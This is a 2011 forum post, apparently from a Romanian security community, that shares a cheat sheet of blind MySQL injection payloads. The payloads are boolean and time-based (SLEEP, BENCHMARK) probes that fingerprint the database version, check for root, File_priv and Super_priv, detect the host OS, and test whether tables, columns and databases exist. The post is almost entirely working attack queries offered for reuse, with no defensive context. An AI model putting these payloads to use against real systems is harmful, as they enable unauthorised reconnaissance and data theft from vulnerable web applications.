MySql | Blind queries

Mecanik · December 7, 2011

/*Din nou daca nu este locul potrivit pentru acest post,rog un admin sa il mute la locul corespunzator./*

Salvati aceasta lista! Este esential sa ai toate aceste functii intr-un singur loc!

Aveti Nevoie de putina engleza din nou:

[fara engleza,nu poti face MySqlInject ]

A couple of useful blind queries to fingerprint the database.

All of these return either True or False, as in, you either get a result or you don't.

Version:

SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(VERSION(),1,1))=53; #MySQL 5

SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(VERSION(),1,1))=52; #MySQL 4

Running as root:

SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT SUBSTR(USER(),1,4))=UNHEX(HEX(0x726F6F74)),1,0)=1

Got File_priv:

SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT File_priv FROM mysql.user WHERE

(CONCAT_WS(CHAR(64),User,Host) LIKE USER()) OR

(CONCAT(User,UNHEX(HEX(0x4025))) LIKE USER()) OR

(CONCAT_WS(CHAR(64),User,Host) LIKE CONCAT(SUBSTR(USER(),1,INSTR(USER(),CHAR(64))),CHAR(37)))

LIMIT 0,1)=CHAR(89),1,0)=1

Got Super_priv (Are we DBA):

SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT Super_priv FROM mysql.user WHERE

(CONCAT_WS(CHAR(64),User,Host) LIKE USER()) OR

(CONCAT(User,UNHEX(HEX(0x4025))) LIKE USER()) OR

(CONCAT_WS(CHAR(64),User,Host) LIKE CONCAT(SUBSTR(USER(),1,INSTR(USER(),CHAR(64))),CHAR(37)))

LIMIT 0,1)=CHAR(89),1,0)=1

Can MySQL Sleep:

#This query will return True and should take above 1 second to execute. If it's a success.

SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT SLEEP(1))=0,1,0)=1

Can MySQL Benchmark:

SELECT * FROM foo.bar WHERE id=1 AND IF(BENCHMARK(1,MD5(0))=0,1,0)=1

Are we on *NIX:

SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(@@datadir,1,1))=47

Are we on Windows:

SELECT * FROM foo.bar WHERE id=1 AND IF(ASCII(SUBSTR(@@datadir,2,1))=58,1,0)=1

Do a certain column exist:

SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(column_name) FROM information_schema.columns WHERE column_name LIKE 'your_column' LIMIT 0,1)>0

Do a certain table exist:

SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_name) FROM information_schema.columns WHERE table_name LIKE 'your_table' LIMIT 0,1)>0

SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_name LIKE 'your_table' LIMIT 0,1)>0

Do a certain database exist:

SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_schema) FROM information_schema.columns WHERE table_schema LIKE 'your_database' LIMIT 0,1)>0

SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_schema) FROM information_schema.tables WHERE table_schema LIKE 'your_database' LIMIT 0,1)>0

SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(schema_name) FROM information_schema.schemata WHERE schema_name LIKE 'your_database' LIMIT 0,1)>0

SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(db) FROM mysql.db WHERE db LIKE 'your_database' LIMIT 0,1)>0

Edited December 7, 2011 by Nytro

SticKyWoX · December 7, 2011

Dai un disable la emoticons in post.

Sign In

MySql | Blind queries

Recommended Posts

Mecanik

SticKyWoX

Join the conversation

Browse

Activity

Pages